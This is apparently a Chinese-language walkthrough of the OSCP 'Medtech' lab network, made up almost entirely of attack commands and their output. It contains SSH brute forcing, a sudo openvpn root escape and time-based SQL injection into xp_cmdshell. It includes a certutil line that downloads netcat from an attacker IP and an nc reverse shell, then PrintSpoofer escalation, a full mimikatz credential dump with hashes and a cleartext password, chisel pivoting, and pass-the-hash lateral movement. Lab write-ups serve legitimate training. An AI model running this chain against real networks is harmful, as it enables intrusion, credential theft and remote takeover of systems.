OSCP-Medtech

192.168.218.120 (WEB01)

NMAP

1
2
3

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

利用取得的憑證ssh
1
存在sudo 直接最高權限

FLAG

1	`5f2d8fcd8e814e67b9294e63f64eeef5`

192.168.218.122 (vpn)

NMAP

1 2	`PORT STATE SERVICE REASON 22/tcp open ssh syn-ack`

hydra 爆破

1
2
3

proxychains4 -q hydra -L user -P /usr/share/wordlists/fasttrack.txt 192.168.218.122 ssh -F -V

[22][ssh] host: 192.168.218.122   login: offsec   password: password

提權

連線發現在受限shell

搜索history找到以下指令

sudo openvpn --dev null --script-security 2 --up '/bin/sh -c sh'

執行後提權

FLAG

# /root/proof.txt
39d34d04037dcbee0461333e8e2666c3

# /home/offsec/local.txt
752b743b1385c73d35891e8f17ac686a

在/home/mario/.ssh 找到id_rsa

1 2	`可連線到172.16.218.14 proxychains4 -q ssh -i id_rsa mario@172.16.218.14`

172.16.218.14 (NTP)

192.168.215.121

NMAP

Host is up, received user-set (0.27s latency).
Scanned at 2023-09-19 22:15:26 CST for 34s
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE      REASON
80/tcp  open  http         syn-ack
135/tcp open  msrpc        syn-ack
139/tcp open  netbios-ssn  syn-ack
445/tcp open  microsoft-ds syn-ack

admin' WAITFOR DELAY '0:0:10'-- 

admin' if (ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)))>1 WAITFOR DELAY '0:0:5'-- 

# 存在dba
'; if (SELECT IS_SRVROLEMEMBER('sysadmin'))>0 WAITFOR DELAY '0:0:5'-- 

# 存在xp_cmdshell
'; if (SELECT COUNT(*) FROM master.dbo.sysobjects WHERE xtype='x' AND name='xp_cmdshell')>0 WAITFOR DELAY '0:0:5'-- 

'; EXEC xp_cmdshell 'certutil -urlcache -split -f http://192.168.45.246:443/nc64.exe c:\\users\\public\\nc64.exe'-- 

'; EXEC xp_cmdshell 'c:\\users\\public\\nc64.exe -e cmd.exe 192.168.45.246 80'--

whoami /priv 存在模擬權限

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

上傳 PrintSpoofer 並執行
1
PrintSpoofer64.exe -i -c cmd.exe

mimikatz

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 1072612 (00000000:00105de4)
Session           : Service from 0
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 9/19/2023 5:11:30 PM
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
	msv :	
	 [00000003] Primary
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * NTLM     : b6191454048eb6ea7bb3058ed8c088f2
	 * SHA1     : b6813ae6c2316b049456dc02ce0122bd62438a5c
	tspkg :	
	wdigest :	
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : WEB02$
	 * Domain   : medtech.com
	 * Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16 
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 718019 (00000000:000af4c3)
Session           : Service from 0
User Name         : MSSQL$MICROSOFT##WID
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 7/11/2023 5:00:17 AM
SID               : S-1-5-80-1184457765-4068085190-3456807688-2200952327-3769537534
	msv :	
	 [00000003] Primary
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * NTLM     : b6191454048eb6ea7bb3058ed8c088f2
	 * SHA1     : b6813ae6c2316b049456dc02ce0122bd62438a5c
	tspkg :	
	wdigest :	
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : WEB02$
	 * Domain   : medtech.com
	 * Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16 
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 322809 (00000000:0004ecf9)
Session           : Service from 0
User Name         : joe
Domain            : MEDTECH
Logon Server      : DC01
Logon Time        : 7/11/2023 4:58:16 AM
SID               : S-1-5-21-976142013-3766213998-138799841-1106
	msv :	
	 [00000003] Primary
	 * Username : joe
	 * Domain   : MEDTECH
	 * NTLM     : 08d7a47a6f9f66b97b1bae4178747494
	 * SHA1     : a0c2285bfad20cc614e2d361d6246579843557cd
	 * DPAPI    : 58de53296298ce0f98087ae902c88735
	tspkg :	
	wdigest :	
	 * Username : joe
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : joe
	 * Domain   : MEDTECH.COM
	 * Password : Flowers1
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 127720 (00000000:0001f2e8)
Session           : Service from 0
User Name         : MSSQL$SQLEXPRESS
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 7/11/2023 4:58:04 AM
SID               : S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133
	msv :	
	 [00000003] Primary
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * NTLM     : b6191454048eb6ea7bb3058ed8c088f2
	 * SHA1     : b6813ae6c2316b049456dc02ce0122bd62438a5c
	tspkg :	
	wdigest :	
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : WEB02$
	 * Domain   : medtech.com
	 * Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16 
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 78617 (00000000:00013319)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 7/11/2023 4:58:03 AM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * NTLM     : b6191454048eb6ea7bb3058ed8c088f2
	 * SHA1     : b6813ae6c2316b049456dc02ce0122bd62438a5c
	tspkg :	
	wdigest :	
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : WEB02$
	 * Domain   : medtech.com
	 * Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16 
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WEB02$
Domain            : MEDTECH
Logon Server      : (null)
Logon Time        : 7/11/2023 4:58:03 AM
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * NTLM     : b6191454048eb6ea7bb3058ed8c088f2
	 * SHA1     : b6813ae6c2316b049456dc02ce0122bd62438a5c
	tspkg :	
	wdigest :	
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : web02$
	 * Domain   : medtech.com
	 * Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16 
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 47681 (00000000:0000ba41)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 7/11/2023 4:58:03 AM
SID               : S-1-5-96-0-0
	msv :	
	 [00000003] Primary
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * NTLM     : b6191454048eb6ea7bb3058ed8c088f2
	 * SHA1     : b6813ae6c2316b049456dc02ce0122bd62438a5c
	tspkg :	
	wdigest :	
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : WEB02$
	 * Domain   : medtech.com
	 * Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16 
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 366858 (00000000:0005990a)
Session           : Interactive from 1
User Name         : joe
Domain            : MEDTECH
Logon Server      : DC01
Logon Time        : 7/11/2023 4:58:18 AM
SID               : S-1-5-21-976142013-3766213998-138799841-1106
	msv :	
	 [00000003] Primary
	 * Username : joe
	 * Domain   : MEDTECH
	 * NTLM     : 08d7a47a6f9f66b97b1bae4178747494
	 * SHA1     : a0c2285bfad20cc614e2d361d6246579843557cd
	 * DPAPI    : 58de53296298ce0f98087ae902c88735
	tspkg :	
	wdigest :	
	 * Username : joe
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : joe
	 * Domain   : MEDTECH.COM
	 * Password : Flowers1
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 322808 (00000000:0004ecf8)
Session           : Service from 0
User Name         : joe
Domain            : MEDTECH
Logon Server      : DC01
Logon Time        : 7/11/2023 4:58:16 AM
SID               : S-1-5-21-976142013-3766213998-138799841-1106
	msv :	
	 [00000003] Primary
	 * Username : joe
	 * Domain   : MEDTECH
	 * NTLM     : 08d7a47a6f9f66b97b1bae4178747494
	 * SHA1     : a0c2285bfad20cc614e2d361d6246579843557cd
	 * DPAPI    : 58de53296298ce0f98087ae902c88735
	tspkg :	
	wdigest :	
	 * Username : joe
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : joe
	 * Domain   : MEDTECH.COM
	 * Password : Flowers1
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 7/11/2023 4:58:04 AM
SID               : S-1-5-17
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 130227 (00000000:0001fcb3)
Session           : Service from 0
User Name         : SQLTELEMETRY$SQLEXPRESS
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 7/11/2023 4:58:04 AM
SID               : S-1-5-80-1985561900-798682989-2213159822-1904180398-3434236965
	msv :	
	 [00000003] Primary
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * NTLM     : b6191454048eb6ea7bb3058ed8c088f2
	 * SHA1     : b6813ae6c2316b049456dc02ce0122bd62438a5c
	tspkg :	
	wdigest :	
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : WEB02$
	 * Domain   : medtech.com
	 * Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16 
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 7/11/2023 4:58:04 AM
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 78636 (00000000:0001332c)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 7/11/2023 4:58:03 AM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * NTLM     : b6191454048eb6ea7bb3058ed8c088f2
	 * SHA1     : b6813ae6c2316b049456dc02ce0122bd62438a5c
	tspkg :	
	wdigest :	
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : WEB02$
	 * Domain   : medtech.com
	 * Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16 
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 47666 (00000000:0000ba32)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 7/11/2023 4:58:03 AM
SID               : S-1-5-96-0-1
	msv :	
	 [00000003] Primary
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * NTLM     : b6191454048eb6ea7bb3058ed8c088f2
	 * SHA1     : b6813ae6c2316b049456dc02ce0122bd62438a5c
	tspkg :	
	wdigest :	
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : WEB02$
	 * Domain   : medtech.com
	 * Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16 
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 46439 (00000000:0000b567)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 7/11/2023 4:58:03 AM
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * NTLM     : b6191454048eb6ea7bb3058ed8c088f2
	 * SHA1     : b6813ae6c2316b049456dc02ce0122bd62438a5c
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WEB02$
Domain            : MEDTECH
Logon Server      : (null)
Logon Time        : 7/11/2023 4:58:03 AM
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WEB02$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : web02$
	 * Domain   : MEDTECH.COM
	 * Password : ad 90 b4 19 89 a2 4d a1 d8 76 a9 cd 8c 3c 0d e8 ed 94 3d f6 80 2d 1c 6c af 70 65 28 20 75 29 6c 35 dd ae 7f 24 67 f3 c3 1e b2 c8 39 f4 35 a4 8c 39 3a 5b 3f 4f 86 6c 36 34 df f7 d5 4f ba 8c 5d 96 56 10 20 a2 46 69 70 3b 17 73 e9 d0 6f 18 b4 db 31 6d 88 f6 be ca 4b 8b a8 4e b9 b9 b9 05 6e b7 5f be 69 58 63 58 bb 3f 1a 86 33 ec cb 74 da 05 c5 31 aa 26 bf cd 51 7e a4 2c 44 f7 18 eb 16 ba 36 db 3d d3 89 36 46 04 c7 a7 9e f7 bc 28 5a 7c 99 f3 8a da c1 6b af bb ef ea a5 71 30 1a 3d 35 6b eb 44 da d4 58 7b b9 59 4b 42 7b f1 93 7b 04 92 f3 30 9e 12 f8 fe ec fd 8b f5 ca 06 a7 ce f6 6f 85 80 33 dc 92 95 1b 6d ca 5d ea df 7b 86 50 a6 f1 e1 92 4e d4 5c 2f f0 e9 f1 71 79 eb 56 64 2a ca 05 89 aa d3 25 84 1f 17 d1 57 ab 0b 16 
	ssp :	
	credman :	
	cloudap :

web.config

type web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.web>
<!--		<customErrors mode="On">
		<error statusCode="500" redirect="error.aspx"/>
			<error statusCode="404" redirect="error.aspx"/>
		</customErrors> -->
    <customErrors mode="RemoteOnly" />
		<compilation debug="true" targetFramework="4.0">
			<assemblies>
				<add assembly="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
				<add assembly="System.DirectoryServices.AccountManagement, Version=3.5.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />
				<add assembly="System.DirectoryServices.Protocols, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
			</assemblies>
		</compilation>
	</system.web>
	<system.webServer>
        <defaultDocument>
            <files>
                <clear />
                <add value="index.html" />
                <add value="index.htm" />
                <add value="default.aspx" />
            </files>
        </defaultDocument>
    </system.webServer>
	<connectionStrings>
		<add name="myConnectionString" connectionString="server=localhost\SQLEXPRESS;database=webapp;uid=sa;password=WhileChirpTuesday218;Trusted_Connection=False;MultipleActiveResultSets=true; Integrated Security=False; Max Pool Size=500;" />
	</connectionStrings>
</configuration>

Ping掃出內網

1	`for /L %i in (1,1,255) do @ping -w 1 -n 1 172.16.197.%i \|findstr "TTL"`

Reply from 172.16.197.10: bytes=32 time<1ms TTL=128
Reply from 172.16.197.11: bytes=32 time<1ms TTL=128
Reply from 172.16.197.12: bytes=32 time<1ms TTL=128
Reply from 172.16.197.13: bytes=32 time<1ms TTL=128
Reply from 172.16.197.14: bytes=32 time<1ms TTL=64
Reply from 172.16.197.82: bytes=32 time<1ms TTL=128
Reply from 172.16.197.83: bytes=32 time<1ms TTL=128
Reply from 172.16.197.120: bytes=32 time<1ms TTL=64
Reply from 172.16.197.122: bytes=32 time<1ms TTL=64
Reply from 172.16.197.254: bytes=32 time<1ms TTL=128

./172.txt

172.16.197.10
172.16.197.11
172.16.197.12
172.16.197.13
172.16.197.14
172.16.197.82
172.16.197.83
172.16.197.120
172.16.197.122
172.16.197.254

Chisel 設置 Socks Proxy

首先在Kali攻擊機監聽chisel server
./chisel_1.8.1_linux_amd64 server -p 8090 --reverse

將chisel.exe 上傳到受害端，並且執行chisel client
chisel.exe client 192.168.45.246:8090 R:socks

設置/etc/proxychains4.conf

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 	127.0.0.1 1080

crackmapexec

1	`proxychains4 -q crackmapexec smb ./172.txt -u 'joe' -p 'Flowers1'`

psexec to 172.16.197.11

1	`proxychains4 -q python3 psexec.py joe:'Flowers1'@172.16.197.11`

FLAG

1 2	`# c:\Users\Administrator\Desktop\proof.txt 91c918547be624f9541e4e848701a08c`

172.16.197.11 (FILES02)

FLAG

# c:\Users\joe\Desktop\local.txt
62e7942a60c0db28aa96c5c7383adf8b

# c:\Users\Administrator\Desktop\proof.txt
411825c61b8ce6b70eb256c75ba3d8cf

在c:/Users/joe/Documents 找到 fileMonitorBackup.log
1
cat fileMonitorBackup.log |grep "Backup"

88934 Oct 04 11:21  Backup      daisy                        6872 Backup Completed. NTLM: abf36048c1cf88f5603381c5128feb8e 
88605 Oct 04 11:21  Backup	   toad                         6872 Backup Completed. NTLM: 5be63a865b65349851c1f11a067a3068                                                                                    
88137 Oct 04 11:21  Backup	   wario                        6872 Backup Completed. NTLM: fdf36048c1cf88f5630381c5e38feb8e                                                                                                                  
87139 Oct 04 11:21  Backup      goomba                       6872 Backup Completed. NTLM: 8e9e1516818ce4e54247e71e71b5f436

建立user 以及 hash的 wordlists，然後用crackmapexec爆破

1 2	`proxychains4 -q crackmapexec smb ./172 -u ./user -H ./hash proxychains4 -q crackmapexec winrm ./172 -u ./user -H ./hash`

也把hash爆破成pass，並建立完整的字典檔

user

daisy
toad
wario
goomba
Administrator
joe
leon
mario
offsec
peach
wario
yoshi

pass
1
2
3
toadstoolpassword Mushroom! squishhop

hash

abf36048c1cf88f5603381c5128feb8e
5be63a865b65349851c1f11a067a3068
fdf36048c1cf88f5630381c5e38feb8e
8e9e1516818ce4e54247e71e71b5f436

evil-winrm

1	`proxychains4 -q evil-winrm -i 172.16.197.83 -u 'wario' -H 'fdf36048c1cf88f5630381c5e38feb8e'`

172.16.197.83 (CLIENT02)

上傳winpeas

1	`winPEASx64.exe quiet cmd fast > c:\Users\wario\DEsktop\result.txt`

找到auditTracker.exe 權限可寫入

auditTracker(auditTracker)[C:\DevelopmentExecutables\auditTracker.exe] - Autoload - isDotNet
    File Permissions: Everyone [AllAccess], Authenticated Users [WriteData/CreateFiles]
    Possible DLL Hijacking in binary folder: C:\DevelopmentExecutables (Everyone [AllAccess], Authenticated Users [WriteData/CreateFiles])
    Tracks the security event log for audit events

sc qc auditTracker

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: auditTracker
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\DevelopmentExecutables\auditTracker.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : auditTracker
        DEPENDENCIES       :
